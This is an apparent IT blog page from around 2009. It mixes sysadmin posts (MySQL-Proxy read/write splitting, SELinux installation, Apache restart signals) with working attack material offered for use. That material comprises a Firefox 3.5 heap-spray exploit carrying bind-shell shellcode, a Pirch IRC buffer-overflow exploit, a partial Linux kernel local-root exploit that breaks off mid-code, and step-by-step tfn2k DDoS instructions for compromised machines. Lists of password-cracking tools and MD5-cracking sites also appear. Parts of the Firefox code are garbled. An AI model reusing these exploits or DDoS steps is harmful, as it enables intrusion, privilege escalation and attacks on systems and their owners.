GO IT WORLD | IT TECH | IT NEWS

goitworld.com

Jul 21

Mozilla Firefox 3.5 (Font tags) Remote Heap Spray Exploit

##################################################
# FireFox 3.5 Heap Spray
# Discovered by: Simon Berry-Bryne
# Coded in Perl by netsoul, ALTO PARANA – Paraguay
# Contact: netsoul2 [at] gmail [dot] com
##################################################

#!/usr/bin/perl -w
use strict;
use POE::Component::Server::HTTP;
POE::Component::Server::HTTP-&gt;new(Port =&gt; my $port = 8080,
ContentHandler =&gt; {&quot;/&quot; =&gt;  sub{$_[1]-&gt;push_header(&quot;Content-Type&quot;, &quot;text/html&quot;), $_[1]-&gt;content()}});
 
print &quot;[-] Listening in port $port...\n[-] Sending payload...\n[-] After 30 secs try with netcat for connect in port 5500\n&quot;;
POE::Kernel-&gt;run();
 
__DATA__
 
 
 
 
//windows - shell_bind_tcp - metasploit - encoding is shikata_ga_nai
var shellcode= unescape("%u6afc%u4deb%uf9e8%uffff%u60ff%u6c8b%u2424%u458b%u8b3c%u057c%u0178%u8bef" +
			"%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca" +
			"%uc201%uf4eb%u543b%u2824%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01" +
			"%u2c03%u898b%u246c%u611c%u31c3%u64db%u438b%u8b30%u0c40%u708b%uad1c%u408b" +
			"%u5e08%u8e68%u0e4e%u50ec%ud6ff%u5366%u6866%u3233%u7768%u3273%u545f%ud0ff" +
			"%ucb68%ufced%u503b%ud6ff%u895f%u66e5%ued81%u0208%u6a55%uff02%u68d0%u09d9" +
			"%uadf5%uff57%u53d6%u5353%u5353%u5343%u5343%ud0ff%u6866%u7c15%u5366%ue189" +
			"%u6895%u1aa4%uc770%uff57%u6ad6%u5110%uff55%u68d0%uada4%ue92e%uff57%u53d6" +
			"%uff55%u68d0%u49e5%u4986%uff57%u50d6%u5454%uff55%u93d0%ue768%uc679%u5779" +
			"%ud6ff%uff55%u66d0%u646a%u6866%u6d63%ue589%u506a%u2959%u89cc%u6ae7%u8944" +
			"%u31e2%uf3c0%ufeaa%u2d42%u42fe%u932c%u7a8d%uab38%uabab%u7268%ub3fe%uff16" +
			"%u4475%ud6ff%u575b%u5152%u5151%u016a%u5151%u5155%ud0ff%uad68%u05d9%u53ce" +
			"%ud6ff%uff6a%u37ff%ud0ff%u578b%u83fc%u64c4%ud6ff%uff52%u68d0%uceef%u60e0" +
			"%uff53%uffd6%u41d0");
oneblock = unescape("%u0c0c%u0c0c");
var fullblock = oneblock;
while (fullblock.length&lt;0x60000)  
{
    fullblock += fullblock;
}
sprayContainer = new Array();
for (i=0; i&lt;600; i++)  
{
    sprayContainer[i] = fullblock + shellcode;
}
var searchArray = new Array()
 
function escapeData(data)
{
 var i;
 var c;
 var escData=&#39;&#39;;
 for(i=0;i 0)  
        while (i&lt;pTags.length)
        {
            oTags = pTags[i].getElementsByTagName(&quot;font&quot;)
            searchArray[i+1] = new Array()
            if (oTags[0])  
            {
                searchArray[i+1][&quot;str&quot;] = oTags[0].innerHTML;
            }
            i++
        }
    }
}
 
function GenerateHTML()
{
    var html = &quot;&quot;;
    for (i=1;i&lt;searchArray.length;i++)
    {
        html += escapeData(searchArray[i][&quot;str&quot;])
    }    
}
DataTranslator();
GenerateHTML()

Tagged with: exploit • mozilla firefox • remote heap

Jul 20

Read/Write Splitting with MySQL-Proxy

By jason Mysql Server 1 Comment »

MySQL-Proxy, announced in June, is a binary application that sits between your MySQL client and server, and supports the embedded scripting language Lua. The proxy can be used to analyze, monitor and transform communication, and supports a wide range of scenarios including:

load balancing and fail over handling
query analysis and logging
SQL macros
query rewriting
executing shell commands

One of the more powerful features of MySQL Proxy is the ability to do "Read/Write Splitting". The basic concept is to have a master database handle transactional queries while slaves handle SELECT queries. Replication is used to synchronize the changes due to transactional queries with the slaves in the cluster.

Jan Kneschke writing about the technique in "MySQL Proxy learns R/W Splitting", discusses connection pooling:

For R/W Splitting we need a connection pooling. We only switch to another backend if we already have a authenticated connection open to that backend.The MySQL protocol first does a challenge-response handshake. When we enter the query/result stage it is too late to authenticate new connections. We have to make sure that we have enough open connections to operate nicely.

The LUA script to handle read/write splitting is straightforward:

— read/write splitting
–
— send all non-transactional SELECTs to a slave
if is_in_transaction == 0 and
packet:byte() == proxy.COM_QUERY and
packet:sub(2, 7) == "SELECT" then
local max_conns = -1    local max_conns_ndx = 0
for i = 1, #proxy.servers do
    local s = proxy.servers[i]
    — pick a slave which has some idling connections
    if s.type == proxy.BACKEND_TYPE_RO and
            s.idling_connections > 0 then
        if max_conns == -1 or
            s.connected_clients < max_conns then
            max_conns = s.connected_clients
            max_conns_ndx = i
        end
      end
    end
    — we found a slave which has a idling connection
    if max_conns_ndx > 0 then
        proxy.connection.backend_ndx = max_conns_ndx
        end
    else
    — send to master
    end
    return proxy.PROXY_SEND_QUERY

Jan notes that the technique can also be used to implement other data distribution strategies, such as sharding.

Tagged with: mysql proxy • read • split • write

Jul 19

Installing SELinux

By jason Application Security No Comments »

SELinux can be installed in three fundamental ways:

As an integral component of a Linux distribution, installed at the same time as the distribution
By using binary or source packages, such as the .deb packages used by Debian GNU/Linux; the ebuilds used by Gentoo Linux; or the RPM packages used by Fedora Core, Red Hat Enterprise Linux, and SUSE Linux
By downloading, compiling, and installing the sources provided by the NSA

At the time of writing, only Fedora Core and Gentoo contain SELinux as a fully supported, native facility. So unless you choose one of those distributions, you must install SELinux yourself. If you install SELinux yourself, it’s generally much more convenient to do so using packages. However, prebuilt packages are not available for every Linux distribution. Those who are unable or unwilling to use a distribution for which packages are available must compile the sources provided by the NSA. In many cases, the sources must be modified in order to work properly with the distinctive characteristics of a specific Linux distribution.

The following sections explain how to install and initially configure SELinux for several popular Linux distributions. The final section of this chapter explains how to install SELinux using the source code provided by the NSA.

Using X with SELinux

Coaxing SELinux into working with X has proven to be somewhat difficult. Recent releases of SELinux perform much better in this regard than older releases. But they still fall short of perfection. It’s common for SELinux users to find that the login screen doesn’t appear or that they can’t log in.

The KDE Desktop has so far proven more resistant to interoperation with SELinux than its rival desktop, GNOME. The central problem is that various KDE programs run as identically named processes. Thus, SELinux cannot assign these KDE processes to distinct domains. One result of this inability is that KDE’s temporary files sometimes cannot be labeled with appropriate domains. Thus, with respect to KDE, SELinux policies tend either to be too restrictive or too lax. We can hope that a future release of KDE or SELinux will somehow address this problem. In the meantime, for those using SELinux, GNOME is generally a better desktop choice than KDE.

If you find yourself unable to log into X, try returning to a text-mode console by pressing Ctrl-Alt-F1. Then log in and reboot the system in non-SELinux mode

Tagged with: install • selinux

Jul 18

Top ten Passwrod Crackers

By jason Security Tools No Comments »

After the tremendously successful 2000 and 2003 security tools surveys, Insecure.Org is delighted to release this 2006 survey. I (Fyodor) asked users from the nmap-hackers mailing list to share their favorite tools, and 3,243 people responded. This allowed me to expand the list to 100 tools, and even subdivide them into categories. This is the category page for password crackers — the full network security list is available here. Anyone in the security field would be well advised to go over the list and investigate tools they are unfamiliar with. I discovered several powerful new tools this way. I also point newbies to this site whenever they write me saying “I don’t know where to start”.

Respondents were allowed to list open source or commercial tools on any platform. Commercial tools are noted as such in the list below. No votes for the Nmap Security Scanner were counted because the survey was taken on a Nmap mailing list. This audience also biases the list slightly toward “attack” hacking tools rather than defensive ones.

Each tool is described by one ore more attributes:

Did not appear on the 2003 list

Generally costs money. A free limited/demo/trial version may be available.

Works natively on Linux

Works natively on OpenBSD, FreeBSD, Solaris, and/or other UNIX variants

Works natively on Apple Mac OS X

Works natively on Microsoft Windows

Features a command-line interface

Offers a GUI (point and click) interface

Source code available for inspection.

Please send updates and suggestions (or better tool logos) to Fyodor. If your tool is featured or you think your site visitors might enjoy this list, you are welcome to use our link banners. Here is the list, starting with the most popular:

Cain and Abel : The top password recovery tool for Windows
UNIX users often smugly assert that the best free security tools support their platform first, and Windows ports are often an afterthought. They are usually right, but Cain & Abel is a glaring exception. This Windows-only password recovery tool handles an enormous variety of tasks. It can recover passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols. It is also well documented.

Also categorized as: packet sniffers

John the Ripper : A powerful, flexible, and fast multi-platform password hash cracker
John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types which are most commonly found on various Unix flavors, as well as Kerberos AFS and Windows NT/2000/XP LM hashes. Several other hash types are added with contributed patches. You will want to start with some wordlists, which you can find here, here, or here.

THC Hydra : A Fast network authentication cracker which supports many different services
When you need to brute force crack a remote authentication service, Hydra is often the tool of choice. It can perform rapid dictionary attacks against more then 30 protocols, including telnet, ftp, http, https, smb, several databases, and much more. Like THC Amap this release is from the fine folks at THC.

Aircrack : The fastest available WEP/WPA cracking tool
Aircrack is a suite of tools for 802.11a/b/g WEP and WPA cracking. It can recover a 40 through 512-bit WEP key once enough encrypted packets have been gathered. It can also attack WPA 1 or 2 networks using advanced cryptographic methods or by brute force. The suite includes airodump (an 802.11 packet capture program), aireplay (an 802.11 packet injection program), aircrack (static WEP and WPA-PSK cracking), and airdecap (decrypts WEP/WPA capture files).

Also categorized as: wireless tools

L0phtcrack : Windows password auditing and recovery application
L0phtCrack attempts to crack Windows passwords from hashes which it can obtain (given proper access) from stand-alone Windows workstations, networked servers, primary domain controllers, or Active Directory. In some cases it can sniff the hashes off the wire. It also has numerous methods of generating password guesses (dictionary, brute force, etc). LC5 was discontinued by Symantec in 2006, then re-acquired by the original L0pht guys and reborn as LC6 in 2009. For free alternatives, consider Ophcrack, Cain and Abel, or John the Ripper.

Airsnort : 802.11 WEP Encryption Cracking Tool
AirSnort is a wireless LAN (WLAN) tool that recovers encryption keys. It was developed by the Shmoo Group and operates by passively monitoring transmissions, computing the encryption key when enough packets have been gathered. You may also be interested in the similar Aircrack.

Also categorized as: wireless tools

SolarWinds : A plethora of network discovery/monitoring/attack tools
SolarWinds has created and sells dozens of special-purpose tools targeted at systems administrators. Security-related tools include many network discovery scanners, an SNMP brute-force cracker, router password decryption, a TCP connection reset program, one of the fastest and easiest router config download/upload applications available and more.

Also categorized as: traffic monitoring tools

Pwdump : A window password recovery tool
Pwdump is able to extract NTLM and LanMan hashes from a Windows target, regardless of whether Syskey is enabled. It is also capable of displaying password histories if they are available. It outputs the data in L0phtcrack-compatible form, and can write to an output file.

RainbowCrack : An Innovative Password Hash Cracker
The RainbowCrack tool is a hash cracker that makes use of a large-scale time-memory trade-off. A traditional brute force cracker tries all possible plaintexts one by one, which can be time consuming for complex passwords. RainbowCrack uses a time-memory trade-off to do all the cracking-time computation in advance and store the results in so-called "rainbow tables". It does take a long time to precompute the tables but RainbowCrack can be hundreds of times faster than a brute force cracker once the precomputation is finished.

Brutus : A network brute-force authentication cracker
This Windows-only cracker bangs against network services of remote systems trying to guess passwords by using a dictionary and permutations thereof. It supports HTTP, POP3, FTP, SMB, TELNET, IMAP, NTP, and more. No source code is available. UNIX users should take a look at THC Hydra.

Tagged with: password crack • tools

Jul 17

online md5 password crack

By jason Security Tools 10 Comments »

http://www.cmd5.com/

MD5 Reverse Lookup
http://linardy.com/md5.php
Digest-MD5-Reverse-1.3
http://search.cpan.org/~blwood/Digest-MD5-Reverse-1.3/
md5 hash search
http://www.hashchecker.com/index.php?_sls=search_hash
mmkey
http://www.mmkey.com/md5/
Dictionary Based Hash Cracker
http://www.securitystats.com/tools/hashcrack.php
project md5
http://schwett.com/md5/
xmd5
http://www.xmd5.org/index_en.htm
http://www.md5.org.cn/index_en.htm
TMTO[dot]ORG
http://www.tmto.org/home/
md5 rednoize
http://md5.rednoize.com/
MD5 Rainbow
http://passcracking.ru/
Reverse MD5 hash lookup
http://tools.benramsey.com/md5/
md5decrypt
http://www.md5decrypt.com/
md5
http://md5decryption.com/
alimamed
http://alimamed.pp.ru/md5/
md5crack
http://md5crack.it-helpnet.de/index.php?op=add
md5 hash database project
http://shm.hard-core.pl/md5/
Hash Calculator
https://www.astalavista.net/?cmd=rainbowtables 在线跑Hash
Ice Breaker
http://ice.breaker.free.fr/
md5This
http://www.md5this.com/
MD5 Encryption/Decryption Tool
http://md5.allfact.info/
MD5 Cracker (How safe is your password?)
http://bokehman.com/cracker/
MD5-crack
http://www.tydal.nu/article/md5-crack/
This is the site for Passwords Recovery. MD5 Rainbow Tables are used here.
http://passcracking.com/
http://passcracking.ru/
MD5 :: Reverse engineer your MD5
http://md5.idiobase.de/
The MD5 Collision Database
http://www.md5-db.com/index.php
GData: An Online MD5 Hash Database
http://gdataonline.com/
milw0rm MD5 Cracker
http://www.milw0rm.com/cracker/info.php
milw0rm MD5 checker
https://elitehackers.info/forums/showthread.php?t=5767

Tagged with: md5 • online • password crack

Jul 15

ddos tools tfn2k usage

By jason Security Tools 4 Comments »

download tfn2k.tgz

1.tar xvzf tfn2k.tgz
2.vi src/Makefile if you machine is linux do Nothing
3. vi src/ip.h Here to do some changes, otherwise there will be compiler error, repeat the definition of the occurrence

           /*struct in_addr 
             { 
              unsigned long int s_addr; 
           };*/

4. compiler

cd tfn2k/src
make

8-32 bit prompted to enter a password, this is the only authentication credentials to remember!

5. Compiler is passed, will have td and tfn

td is the guardian of the process used to install the client machine, and is controlled tfn client.

6.please upload "td" to you rooted machine and run it

7.test Communications

./tfn -f host.txt -c 10 -i "mkdir testfile"

if client found testfile is successed

8.start attack–

ICMP attacks

#. / tfn-f hosts.txt-c 6 -i target (10 minutes,target on the death of)

SYN / TCP attacks:

#./ tfn-f hosts.txt-c 5 -i target-p 80

UDP attacks:

#. / tfn-f hosts.txt-c 4 -i target

ICMP / TCP / UDP attack rotation:

#. / tfn-f hosts.txt-c 8 -i target

To stop the attack:

#. / tfn-f host.txt-c 0

Tagged with: ddos tools • tfn2k

Jul 14

Stopping and Restarting Apache

By jason Apache Server No Comments »

This document covers stopping and restarting Apache on Unix only.

You will notice many httpd executables running on your system, but you should not send signals to any of them except the parent, whose pid is in the PidFile. That is to say you shouldn’t ever need to send signals to any process except the parent. There are three signals that you can send the parent: TERM, HUP, and USR1, which will be described in a moment.

To send a signal to the parent you should issue a command such as:

    kill -TERM `cat /usr/local/apache/logs/httpd.pid`

You can read about its progress by issuing:

    tail -f /usr/local/apache/logs/error_log

Modify those examples to match your ServerRoot and PidFile settings.

As of Apache 1.3 we provide a script called apachectl which can be used to start, stop, and restart Apache. It may need a little customization for your system, see the comments at the top of the script.

TERM Signal: stop now

Sending the TERM signal to the parent causes it to immediately attempt to kill off all of its children. It may take it several seconds to complete killing off its children. Then the parent itself exits. Any requests in progress are terminated, and no further requests are served.

HUP Signal: restart now

Sending the HUP signal to the parent causes it to kill off its children like in TERM but the parent doesn’t exit. It re-reads its configuration files, and re-opens any log files. Then it spawns a new set of children and continues serving hits.

Users of the status module will notice that the server statistics are set to zero when a HUP is sent.

Note: If your configuration file has errors in it when you issue a restart then your parent will not restart, it will exit with an error. See below for a method of avoiding this.

USR1 Signal: graceful restart

Note: prior to release 1.2b9 this code is quite unstable and shouldn’t be used at all.

The USR1 signal causes the parent process to advise the children to exit after their current request (or to exit immediately if they’re not serving anything). The parent re-reads its configuration files and re-opens its log files. As each child dies off the parent replaces it with a child from the new generation of the configuration, which begins serving new requests immediately.

This code is designed to always respect the MaxClients, MinSpareServers, and MaxSpareServers settings. Furthermore, it respects StartServers in the following manner: if after one second at least StartServers new children have not been created, then create enough to pick up the slack. This is to say that the code tries to maintain both the number of children appropriate for the current load on the server, and respect your wishes with the StartServers parameter.

Users of the status module will notice that the server statistics are not set to zero when a USR1 is sent. The code was written to both minimize the time in which the server is unable to serve new requests (they will be queued up by the operating system, so they’re not lost in any event) and to respect your tuning parameters. In order to do this it has to keep the scoreboard used to keep track of all children across generations.

The status module will also use a G to indicate those children which are still serving requests started before the graceful restart was given.

At present there is no way for a log rotation script using USR1 to know for certain that all children writing the pre-restart log have finished. We suggest that you use a suitable delay after sending the USR1 signal before you do anything with the old log. For example if most of your hits take less than 10 minutes to complete for users on low bandwidth links then you could wait 15 minutes before doing anything with the old log.

Note: If your configuration file has errors in it when you issue a restart then your parent will not restart, it will exit with an error. In the case of graceful restarts it will also leave children running when it exits. (These are the children which are "gracefully exiting" by handling their last request.) This will cause problems if you attempt to restart the server — it will not be able to bind to its listening ports. Before doing a restart, you can check the syntax of the configuration files with the -t command line argument. This still will not guarantee that the server will restart correctly. To check the semantics of the configuration files as well as the syntax, you can try starting httpd as a non-root user. If there are no errors it will attempt to open its sockets and logs and fail because it’s not root (or because the currently running httpd already has those ports bound). If it fails for any other reason then it’s probably a config file error and the error should be fixed before issuing the graceful restart.

Appendix: signals and race conditions

Prior to Apache 1.2b9 there were several race conditions involving the restart and die signals (a simple description of race condition is: a time-sensitive problem, as in if something happens at just the wrong time it won’t behave as expected). For those architectures that have the "right" feature set we have eliminated as many as we can. But it should be noted that there still do exist race conditions on certain architectures.

Architectures that use an on disk ScoreBoardFile have the potential to corrupt their scoreboards. This can result in the "bind: Address already in use" (after HUP) or "long lost child came home!" (after USR1). The former is a fatal error, while the latter just causes the server to lose a scoreboard slot. So it might be advisable to use graceful restarts, with an occasional hard restart. These problems are very difficult to work around, but fortunately most architectures do not require a scoreboard file. See the ScoreBoardFile documentation for a architecture uses it.

NEXT and MACHTEN (68k only) have small race conditions which can cause a restart/die signal to be lost, but should not cause the server to do anything otherwise problematic.

All architectures have a small race condition in each child involving the second and subsequent requests on a persistent HTTP connection (KeepAlive). It may exit after reading the request line but before reading any of the request headers. There is a fix that was discovered too late to make 1.2. In theory this isn’t an issue because the KeepAlive client has to expect these events because of network latencies and server timeouts. In practice it doesn’t seem to affect anything either — in a test case the server was restarted twenty times per second and clients successfully browsed the site without getting broken images or empty documents.

Tagged with: apache • restart

Jul 13

Pirch IRC 98 Client (response) Remote BOF Exploit (SEH)

By jason Security Tools No Comments »

#[*] Usage : python pirch.py
#
#[*] Bug : Pirch IRC 98 Client (response) Remote BOF Exploit (SEH)
#[*] Tested on : Xp sp3 (EN)(VB)
#[*] Ref : Bid 5079
#[*] Exploited by : His0k4
#[*] Greetings : All friends (DZ)

#!/usr/bin/python
 
from socket import *
 
# win32_exec -  EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
shellcode=(
&quot;\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49&quot;
&quot;\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36&quot;
&quot;\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34&quot;
&quot;\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41&quot;
&quot;\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54&quot;
&quot;\x42\x30\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x58\x4e\x47&quot;
&quot;\x45\x50\x4a\x37\x41\x50\x4f\x4e\x4b\x58\x4f\x34\x4a\x41\x4b\x58&quot;
&quot;\x4f\x55\x42\x52\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48&quot;
&quot;\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c&quot;
&quot;\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e&quot;
&quot;\x46\x4f\x4b\x33\x46\x55\x46\x52\x46\x50\x45\x47\x45\x4e\x4b\x48&quot;
&quot;\x4f\x55\x46\x52\x41\x30\x4b\x4e\x48\x56\x4b\x48\x4e\x30\x4b\x34&quot;
&quot;\x4b\x48\x4f\x35\x4e\x51\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x58&quot;
&quot;\x41\x50\x4b\x4e\x49\x48\x4e\x55\x46\x42\x46\x50\x43\x4c\x41\x43&quot;
&quot;\x42\x4c\x46\x36\x4b\x38\x42\x54\x42\x33\x45\x38\x42\x4c\x4a\x47&quot;
&quot;\x4e\x30\x4b\x48\x42\x34\x4e\x50\x4b\x58\x42\x57\x4e\x51\x4d\x4a&quot;
&quot;\x4b\x48\x4a\x36\x4a\x50\x4b\x4e\x49\x50\x4b\x48\x42\x38\x42\x4b&quot;
&quot;\x42\x30\x42\x50\x42\x30\x4b\x58\x4a\x56\x4e\x43\x4f\x35\x41\x33&quot;
&quot;\x48\x4f\x42\x46\x48\x55\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57&quot;
&quot;\x42\x45\x4a\x46\x42\x4f\x4c\x58\x46\x30\x4f\x35\x4a\x46\x4a\x59&quot;
&quot;\x50\x4f\x4c\x58\x50\x50\x47\x45\x4f\x4f\x47\x4e\x43\x36\x41\x56&quot;
&quot;\x4e\x36\x43\x56\x42\x30\x5a&quot;)
 
payload =  &quot;DZ&quot; #Trick track
payload += shellcode
payload += &quot;\x41&quot;*(1035-len(shellcode))
payload += &quot;\xE8\xF0\xFB\xFF\xFF&quot; # back again
payload += &quot;\x42&quot;*5
payload += &quot;\xEB\xF4\xFF\xFF&quot; # back
payload += &quot;\x9A\x2B\x40\x0A&quot; # lucky x0A=&gt;x00  ;)   univ p/p/r
 
 
head =  &quot;:irc.localhost 001 attacker :Welcome to the Internet Relay Chat network, attacker!pirch@0.0.0.0\r\n&quot;
head += &quot;:attacker_test!pirch@0.0.0.gl08= MODE &quot;+payload+&quot; :-i\r\n&quot;
 
 
s = socket(AF_INET, SOCK_STREAM)
s.bind((&quot;0.0.0.0&quot;, 6667))
s.listen(1)
 
print &quot;[*] Listening on [IRC] 6667&quot;
c, addr = s.accept()
print &quot;[*] Connection accepted from: %s&quot; % (addr[0])
c.recv(1024)
c.send(head)
 
raw_input(&quot;[*] Payload sended!\nPress key to exit&quot;)
c.close()
s.close()

Tagged with: pirh irc 98 • remote bof exploit

Jul 12

Linux Kernel <= 2.6.28.3 set_selection() UTF-8 Off By One Local Exploit

By jason Security Tools 4 Comments »

/* CVE-2009-1046 Virtual Console UTF-8 set_selection() off-by-one(two) Memory Corruption
* Linux Kernel <= 2.6.28.3
*
* coded by: sgrakkyu <at> antifork.org
* http://kernelbof.blogspot.com/2009/07/even-when-one-byte-matters.html
*
* Dedicated to all people talking nonsense about non exploitability of kernel heap off-by-one overflow
*
* NOTE-1: you need a virtual console attached to the standard output (stdout)
* – physical login
* – ptrace() against some process with the same uid already attached to a VC
* – remote management ..
*
* NOTE-2: UTF-8 character used is: U+253C – it seems to be supported in most standard console fonts
* but if it’s _not_: change it (and change respectively STREAM_ZERO and STREAM_ZERO_ALT defines)
* If you use an unsupported character expect some sort of recursive fatal ooops:)
*
* Designed to be built as x86-64 binary only (SLUB ONLY)
* SCTP stack has to be available
*
* Tested on target:
* Ubuntu 8.04 x86_64 (2.6.24_16-23 generic/server)
* Ubuntu 8.10 x86_64 (2.6.27_7-10 genric/server)
* Fedora Core 10 x86_64 (default installed kernel – without selinux)
*
*/

#define _GNU_SOURCE
#include <stdio.h>
#include <sched.h>
#include <errno.h>
#include <netinet/in.h>
#include <netinet/sctp.h>
#include <arpa/inet.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/ioctl.h>
#include <stdlib.h>
#include <string.h>
#include <linux/tiocl.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <signal.h>
#include <sys/mman.h>
#include <sched.h>
#include <unistd.h>
#include <fcntl.h>

#ifndef __x86_64__
#error "Architecture Unsupported"
#error "This code was written for x86-64 target and has to be built as x86-64 binary"
#else

#ifndef __u8
#define __u8 uint8_t
#endif
#ifndef __u16
#define __u16 uint16_t
#endif
#ifndef __u32
#define __u32 uint32_t
#endif
#ifndef __u64
#define __u64 uint64_t
#endif

#define STREAM_ZERO 10
#define STREAM_ZERO_ALT 12

#define SCTP_STREAM 22
#define STACK_SIZE 0×1000
#define PAGE_SIZE 0×1000
#define STRUCT_PAGE 0×0000000000000000
#define STRUCT_PAGE_ALT 0×0000000100000000
#define CODE_PAGE 0×0000000000010000
#define LOCALHOST "127.0.0.1"
#define KMALLOC "kmalloc-128"
#define TIMER_LIST_FOPS "timer_list_fops"

#define __msg_f(format, args…) \
do { fprintf(stdout, format, ## args); } while(0)

#define __msg(msg) \
do { fprintf(stdout, "%s", msg); } while(0)

#define __fatal_errno(msg) \
do { perror(msg); __free_stuff(); exit(1); } while(0)

#define __fatal(msg) \
do { fprintf(stderr, msg); __free_stuff(); exit(1); } while(0)

#define CJUMP_OFF 13
char ring0[]=
"\x57"                                      //    push   %rdi
"\x50"                                      //    push   %rax
"\x65\x48\x8b\x3c\x25\x00\x00\x00\x00"      //    mov    %gs:0×0,%rdi
"\x48\xb8\x41\x41\x41\x41\x41\x41\x41\x41" //    mov   xxx, %rax
"\xff\xd0"                                  //    callq *%rax
"\x58"                                      //    pop    %rax
"\x5f"                                      //    pop    %rdi
"\xc3";                                     //    retq

/* conn struct */
static __u16 srvport;
struct sockaddr_in server_s;
static struct sockaddr_in caddr;

/* some fds.. */
static int g_array[10];
static int fd_zmap_srv=-1;
static int kmalloc_fd=-1;
static int unsafe_fd[4] = {-1,-1,-1,-1};

/* misc */
static int dorec = 0, cankill=1, highpage=0;
static char cstack[STACK_SIZE*2];
static __u16 zstream=STREAM_ZERO;
static __u32 uid,gid;
static __u64 fops;
static pid_t child=0;
static char symbuf[20000];

static void __free_stuff()
{
int i;
for(i=3; i<2048; i++)
{
    if((unsafe_fd[0] == i || unsafe_fd[1] == i ||
       unsafe_fd[2] == i || unsafe_fd[3] == i))
        continue;

close(i);
}
}

static void bindcpu()
{
cpu_set_t set;
CPU_ZERO(&set);
CPU_SET(0, &set);
if(sched_setaffinity(0, sizeof(cpu_set_t), &set) < 0)
__fatal_errno("setaffinity");
}

/* parse functions are not bof-free:) */
static __u64 get_fops_addr()
{
FILE* stream;
char fbuf[256];
char addr[32];
stream = fopen("/proc/kallsyms", "r");
if(stream < 0)
__fatal_errno("open: kallsyms");

memset(fbuf, 0×00, sizeof(fbuf));
while(fgets(fbuf, 256, stream) > 0)
{
    char *p = fbuf;
    char *a = addr;
    memset(addr, 0×00, sizeof(addr));
    fbuf[strlen(fbuf)-1] = 0;
    while(*p != ‘ ‘)
      *a++ = *p++;
    p += 3;
    if(!strcmp(p, TIMER_LIST_FOPS))
      return strtoul(addr, NULL, 16);
}

return 0;
}

static int get_total_object(int fd)
{
char name[32];
char used[32];
char total[32];
char *ptr[] = {name, used, total};
int ret,i,toread=sizeof(symbuf)-1;
char *p = symbuf;

lseek(fd, 0, SEEK_SET);
memset(symbuf, 0×00, sizeof(symbuf));
while( (ret = read(fd, p, toread)) > 0)
{
p += ret;
toread -= ret;
}

p = symbuf;
do
{
    for(i=0; i<sizeof(ptr)/sizeof(void*); i++)
    {
      char *d = ptr[i];
      while(*p != ‘ ‘)
        *d++ = *p++;
      *d = 0;
      while(*p == ‘ ‘)
        p++;
    }
    while(*p++ != ‘\n’);
    if(!strcmp(KMALLOC, name))
      return atoi(total);

} while(*p != 0);
return 0;
}

static void ring0c(void* t)
{
int i;
__u32 *p = t;
for(i=0; i<1100; i++,p++)
{
      if(p[0] == uid && p[1] == uid && p[2] == uid && p[3] == uid &&
         p[4] == gid && p[5] == gid && p[6] == gid && p[7] == gid)
         {
           p[0] = p[1] = p[2] = p[3] = 0;
           p[4] = p[5] = p[6] = p[7] = 0;
           /* dont care about caps */
           break;
         }
}
}

static int get_kmalloc_fd()
{
int fd;
fd = open("/proc/slabinfo", O_RDONLY);
if(fd < 0)
__fatal_errno("open: slabinfo");
return fd;
}

static int write_sctp(int fd, struct sockaddr_in *s, int channel)
{
int ret;
ret = sctp_sendmsg(fd, "a", 1,
(struct sockaddr *)s, sizeof(struct sockaddr_in),
0, 0, channel, 0 ,0);
return ret;
}

static void set_sctp_sock_opt(int fd, __u16 in, __u16 out)
{
struct sctp_initmsg msg;
int val=1;
socklen_t len_sctp = sizeof(struct sctp_initmsg);
getsockopt(fd, SOL_SCTP, SCTP_INITMSG, &msg, &len_sctp);
msg.sinit_num_ostreams=out;
msg.sinit_max_instreams=in;
setsockopt(fd, SOL_SCTP, SCTP_INITMSG, &msg, len_sctp);
setsockopt(fd, SOL_SCTP, SCTP_NODELAY, (char*)&val, sizeof(val));
}

static int create_and_init(void)
{
int fd = socket(PF_INET, SOCK_STREAM, IPPROTO_SCTP);
if(fd < 0)
__fatal_errno("socket: sctp");
set_sctp_sock_opt(fd, SCTP_STREAM, SCTP_STREAM);
return fd;
}

static void connect_peer(int fd, struct sockaddr_in *s)
{
int ret;
ret = connect(fd, (struct sockaddr *)s, sizeof(struct sockaddr_in));
if(ret < 0)
__fatal_errno("connect: one peer");
}

static void conn_and_write(int fd, struct sockaddr_in *s, __u16 stream)
{
connect_peer(fd,s);
write_sctp(fd, s, stream);
}

static int clone_thread(void*useless)
{
int o = 1;
int c=0,idx=0;
int fd, ret;
struct sockaddr_in tmp;
socklen_t len;

bindcpu();
server_s.sin_family = PF_INET;
server_s.sin_port = htons(srvport);
server_s.sin_addr.s_addr = inet_addr(LOCALHOST);

fd = socket(PF_INET, SOCK_STREAM, IPPROTO_SCTP);
if(fd < 0)
return -1;

set_sctp_sock_opt(fd, SCTP_STREAM, SCTP_STREAM);
setsockopt(fd, SOL_SOCKET, SO_REUSEADDR, (char *)&o, sizeof(o));

ret = bind(fd, (struct sockaddr *)&server_s, sizeof(struct sockaddr_in));
if(ret < 0)
return -1;

ret = listen(fd, 100);
